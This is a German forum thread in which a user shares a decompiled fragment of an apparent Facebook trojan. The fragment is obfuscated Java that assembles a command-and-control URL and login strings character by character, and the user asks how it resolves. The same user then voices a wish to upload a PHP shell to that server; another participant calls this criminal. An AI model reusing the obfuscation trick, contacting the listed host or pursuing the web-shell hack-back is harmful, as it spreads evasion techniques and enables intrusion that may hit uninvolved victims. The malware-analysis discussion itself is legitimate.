Hi,
ich hab eine *.jar decompeliert, und guck jetzt einwenig in den Code herum.
Dabei ist mir die URL aufgefallen.
Bei der URL bin ich jetzt bei
http://
neposopuhote.redirectment
:83
/service/index.php
Wie setzt sich das ganze zusammen?
Danke
###
this.session = ("" + System.currentTimeMillis());
this.domain = "n"; this.serviceUrl = "h"; this.domain += "e"; this.domain += "p"; this.serviceUrl += "t"; this.domain += "o";
this.domain += "s"; this.domain += "o"; this.domain += "p"; this.domain += "u"; this.serviceUrl += "t"; this.domain += "h"; this.domain += "o"; this.domain += "t";
this.domain += "e";
this.domain += ".";
this.domain += "r";
this.serviceUrl += "p";
this.domain += "e";
this.domain += "d";
this.domain += "i";
this.pwd = this.number;
this.pwd += "d";
this.domain += "r";
this.serviceUrl += ":";
this.domain += "e";
this.domain += "c";
this.pwd += "w";
this.usr = "u";
this.domain += "t";
this.domain += "m";
this.domain += "e";
this.usr += "s";
this.serviceUrl += "/"; this.domain += ".";
this.serviceUrl += "/";
this.domain += "n";
this.domain += "e";
this.domain += "t";
this.serviceUrl += this.domain;
this.serviceUrl += ":";
this.serviceUrl += "8"; this.serviceUrl += "3"; this.serviceUrl += "/";
this.serviceUrl += "s";
this.serviceUrl += "e";
this.serviceUrl += "r";
this.usr += "r";
this.serviceUrl += "v";
this.serviceUrl += "i";
this.serviceUrl += "c";
this.serviceUrl += "e";
this.serviceUrl += "/";
this.serviceUrl += "i";
this.serviceUrl += "n";
this.serviceUrl += "d";
this.serviceUrl += "e";
this.serviceUrl += "x";
this.serviceUrl += ".";
this.serviceUrl += "p";
this.serviceUrl += "h";
this.serviceUrl += "p";
this.pwd += "p";
this.usr += this.number;
Das Ding ist in Viren usw, weils in einem "Facebook Trojaner" ist
Viren, Spyware, Datenschutz 11.214 Themen, 94.187 Beiträge
Schade, hätt da gern eine phpShell hochgeladen.
Dir ist aber schon klar, dass das zum einen bei einem nicht so ohne weiteres möglich ist und zum anderen straftrechtlich problematisch ist? Und wahrscheinlich triffst Du damit vor allem unbeteiligte Opfer…
beim nächsten Trojaner wird der Code wohl auch funktionieren, da this.session, this.domain usw wohl immer drin stehen wird
Warum sollte das immer da drin stehen?